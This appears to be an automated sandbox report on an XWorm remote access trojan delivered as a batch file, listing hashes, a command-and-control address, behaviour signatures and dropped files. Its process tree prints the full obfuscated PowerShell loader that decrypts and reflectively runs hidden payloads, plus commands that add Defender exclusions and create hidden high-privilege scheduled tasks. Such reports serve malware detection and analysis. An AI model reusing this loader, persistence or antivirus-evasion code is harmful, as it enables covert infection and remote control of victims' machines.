Analysis

  • max time kernel
    90s
  • max time network
    99s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    26-05-2024 02:43

General

  • Target

    ZchuzoCLIENTV3.bat

  • Size

    461KB

  • MD5

    d5a276beb0a9ab34d8ab304e9d511a48

  • SHA1

    79dbd692e151c4d9d3d852bc21b1a8fef7b26e6f

  • SHA256

    9a371c5191f7f8d74b87eb11fd8c75f9a9e50f6b6b2ed0e2fe54b9a8f9827408

  • SHA512

    ad5362a1fd966cc3b5e8c519d0e5d87bd98e02f915812037258aa3c826ec6d86e4d2429e449e1a232da57dd96050dee783681466cceba77354822f1b9b144901

  • SSDEEP

    12288:fDSZA9gZpmlN/WsxPm01HWyg8f9plO2QhQ+3U1/:fGf8NH+0ps8fblO291

Malware Config

Extracted

Family

xworm

Version

5.0

C2

another-limits.gl.at.ply.gg:63201

Mutex

xubtXp6ps981ap9u

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    $77wsappx.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Runs PowerShell with the display window hidden.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ZchuzoCLIENTV3.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1924
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R/dppgOhpePEb/+YI79jCEQq3x1zwsVvIMyS1keeutw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oHVtZunj5QiqGDq/USZArg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZoMcY=New-Object System.IO.MemoryStream(,$param_var); $ljKMi=New-Object System.IO.MemoryStream; $TQYiG=New-Object System.IO.Compression.GZipStream($ZoMcY, [IO.Compression.CompressionMode]::Decompress); $TQYiG.CopyTo($ljKMi); $TQYiG.Dispose(); $ZoMcY.Dispose(); $ljKMi.Dispose(); $ljKMi.ToArray();}function execute_function($param_var,$param2_var){ $TxuXG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XsLUp=$TxuXG.EntryPoint; $XsLUp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ZchuzoCLIENTV3.bat';$uPZqd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ZchuzoCLIENTV3.bat').Split([Environment]::NewLine);foreach ($VjFFC in $uPZqd) { if ($VjFFC.StartsWith(':: ')) { $tYAyV=$VjFFC.Substring(3); break; }}$payloads_var=[string[]]$tYAyV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:8
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_100_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_100.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4700
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_100.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:764
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_100.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4480
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R/dppgOhpePEb/+YI79jCEQq3x1zwsVvIMyS1keeutw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oHVtZunj5QiqGDq/USZArg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZoMcY=New-Object System.IO.MemoryStream(,$param_var); $ljKMi=New-Object System.IO.MemoryStream; $TQYiG=New-Object System.IO.Compression.GZipStream($ZoMcY, [IO.Compression.CompressionMode]::Decompress); $TQYiG.CopyTo($ljKMi); $TQYiG.Dispose(); $ZoMcY.Dispose(); $ljKMi.Dispose(); $ljKMi.ToArray();}function execute_function($param_var,$param2_var){ $TxuXG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XsLUp=$TxuXG.EntryPoint; $XsLUp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_100.bat';$uPZqd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_100.bat').Split([Environment]::NewLine);foreach ($VjFFC in $uPZqd) { if ($VjFFC.StartsWith(':: ')) { $tYAyV=$VjFFC.Substring(3); break; }}$payloads_var=[string[]]$tYAyV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1772
            • C:\Users\Admin\AppData\Local\Temp\cmd.exe
              "C:\Users\Admin\AppData\Local\Temp\cmd.exe"
              6⤵
              • Executes dropped EXE
              PID:2980
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:820
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3676
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\$77wsappx.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3740
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77wsappx.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2172
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77wsappx" /tr "C:\ProgramData\$77wsappx.exe"
              6⤵
              • Creates scheduled task(s)
              PID:2888
  • C:\ProgramData\$77wsappx.exe
    C:\ProgramData\$77wsappx.exe
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    PID:3468
  • C:\ProgramData\$77wsappx.exe
    C:\ProgramData\$77wsappx.exe
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    PID:1188

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\ProgramData\$77wsappx.exe

    Filesize

    440KB

    MD5

    0e9ccd796e251916133392539572a374

    SHA1

    eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

    SHA256

    c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

    SHA512

    e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77wsappx.exe.log

    Filesize

    2KB

    MD5

    627073ee3ca9676911bee35548eff2b8

    SHA1

    4c4b68c65e2cab9864b51167d710aa29ebdcff2e

    SHA256

    85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

    SHA512

    3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    df472dcddb36aa24247f8c8d8a517bd7

    SHA1

    6f54967355e507294cbc86662a6fbeedac9d7030

    SHA256

    e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

    SHA512

    06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    62KB

    MD5

    e566632d8956997225be604d026c9b39

    SHA1

    94a9aade75fffc63ed71404b630eca41d3ce130e

    SHA256

    b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0

    SHA512

    f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

    Filesize

    1KB

    MD5

    c81d47c3b95d180e012e8380740c4349

    SHA1

    702eded5bde64ab869985b0934655e18dbdc6a70

    SHA256

    cfaa4c0d9f07288af8d6722f228edf33b0d87a4fde1b468f0c3afb837cd061cc

    SHA512

    982beff2c7b39aa271d26424c51e2e10f0a3ea7e1f7321e37397e7811feb409b39408a6cb22b6dfe271cd9c1048b89f5a80e193b570d18a46b7acc2e542f21f1

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    981d4695b1c524eac18bbed0bad44e88

    SHA1

    ec03abf1a1fa8daffe0771ec264be31d84300b29

    SHA256

    c2e47ecbeb8051450f283c618e69f9de7ed115d962b8973180343f997914fc95

    SHA512

    2d17c0c5d0d5f72ae7c28914478144bdefb58c5accbfb370ea70af9275e0e1e2cc78200f910e8d44d179a3b7f4c092bdb2536a72e2a02433f2ad092e325be3b1

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    59d37a8c588c83e806678c7fb5d1229f

    SHA1

    4396d68567f30f08e08a269802fe3f4784b88c5b

    SHA256

    c1af181e4703177ae1c55f2160c6b7685f3536da35a1501e4a70e25155519e84

    SHA512

    19223db6932776bdfcd8202a8ca19e60deacacdc6e44f2f219b541b4e2eadb82c7c819512f17c76f9ca177ca89452adbebf30dceef9fcc05085472ff49ea8dc2

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    1a9fa92a4f2e2ec9e244d43a6a4f8fb9

    SHA1

    9910190edfaccece1dfcc1d92e357772f5dae8f7

    SHA256

    0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

    SHA512

    5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    dbed6207e0d3208bd0ee26b6c99307e3

    SHA1

    facbc3806e7596b021efd6a475cd407058223703

    SHA256

    631632aac60e6815fb18144cce66425db89b75c1e9d2c4af46d9d5148b6f5f72

    SHA512

    a0fbe5b0d32f20ffe23aebf00b77d41159ed7c01b2302efa6e6a0cc61e4c008538f44d2cf8c7ab6c062317d1c5762eebedf0d9a06a7fdde112d231f0a27fff8e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    cedfb5c5943c2ab470a28f4187bc7750

    SHA1

    c634b313064d775057dc00f8101799772d546f31

    SHA256

    b323dd9ecd1d7e51d695ad1b2fd14fe83e24fc1ea6bd7ad0322cca931b8a4263

    SHA512

    e50eb221c77d51bec6b43c520612679bb877a8749f5986b172bce443f6a989118f5796e727ce8dc599918588bfb9ee04ac7028b30d1a33d7bcf8a96322941321

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2fgopx1e.shn.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\cmd.exe

    Filesize

    316KB

    MD5

    eb1071a4d69294f036d40d1fbf61c375

    SHA1

    5a934a89613197bc01b76f47fd13b1d5e25074ec

    SHA256

    becbbeaa24cca7e38ae19de32c9681f9b064e9fdbc60e1545091875d7008d13d

    SHA512

    412045afc8ebba68cb1c00e74bdc007aeb426a4110a9f7d898bb6cc65417246095cd01c1ff63dea860d371897e1857905c0403a7fdb575cc96ea404f9b5ee487

  • C:\Users\Admin\AppData\Roaming\startup_str_100.bat

    Filesize

    461KB

    MD5

    d5a276beb0a9ab34d8ab304e9d511a48

    SHA1

    79dbd692e151c4d9d3d852bc21b1a8fef7b26e6f

    SHA256

    9a371c5191f7f8d74b87eb11fd8c75f9a9e50f6b6b2ed0e2fe54b9a8f9827408

    SHA512

    ad5362a1fd966cc3b5e8c519d0e5d87bd98e02f915812037258aa3c826ec6d86e4d2429e449e1a232da57dd96050dee783681466cceba77354822f1b9b144901

  • C:\Users\Admin\AppData\Roaming\startup_str_100.vbs

    Filesize

    115B

    MD5

    43cb2ab54a3805f47352eae51aefb572

    SHA1

    2a579105ab98a017140616961936afd1a894ecae

    SHA256

    e6809d7975256ebee58f550bd676f78c15abc82c7fbe657f568c18ec5c7ff1f6

    SHA512

    df83b7877dfda4483cac588917cbb6855e99ca775cd6cbe3ac347c697a022e0e5cee9edc2c788c79601e9d27d0c9a86f93e29b0fff559ffb55b120f52a41e3b8
